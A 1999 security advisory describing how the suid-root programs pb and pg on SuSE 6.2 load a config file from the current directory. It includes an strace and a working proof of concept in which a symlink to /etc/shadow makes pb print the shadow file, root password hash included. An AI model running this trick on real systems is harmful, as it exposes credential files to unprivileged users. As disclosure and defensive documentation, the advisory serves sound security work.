SuSE 6.2 '/usr/bin/pb' and '/usr/bin/pg' allows reading of local files
20 Sep. 1999
Summary
'/usr/bin/pb' and '/usr/bin/pg' are both suid root by default on SuSE 6.2, and can be used by local users to read any file on the system. This is due to a hole in the way the program handles loading of configuration files.
Credit:
This vulnerability has been found by: Brock Tellier.
susebox:/root # strace /usr/bin/pb
...
personality(PER_LINUX) = 0
getpid() = 16623
brk(0) = 0x805032c
brk(0x80504cc) = 0x80504cc
brk(0x8051000) = 0x8051000
open("pb.conf", O_RDONLY) <-- trouble? = -1 ENOENT (No such file or
directory)
write(2, "pb.conf fopen: No such file or d"..., 41pb.conf fopen: No such
file or directory
) = 41
_exit(1) = ?
susebox:/root #
---
xnec@susebox:/tmp > id
uid=1001(xnec) gid=100(users) groups=100(users)
xnec@susebox:/tmp > ln -s /etc/shadow ./pb.conf
xnec@susebox:/tmp > pb
Unknown config line : <root:nfpzNvX19GwRg:10850:0:10000::::> =
<bin:*:8902:0:10000::::>
Unknown config line : <daemon:*:8902:0:10000::::> =
<lp:*:9473:0:10000::::>
Unknown config line : <news:*:8902:0:10000::::> = <uucp:*:0:0:10000::::>
Unknown config line : <games:*:0:0:10000::::> = <man:*:8902:0:10000::::>
... etc for the entire shadow file
The same scenario is applicable for /usr/bin/pg's pg.conf in the cwd. These two programs also contain numerous buffer overflows and other insecure file i/o and should obviously lose their suid bits. They cannot operate correctly without their s-bits unless they are run by root, but no one besides root will run them anyway.
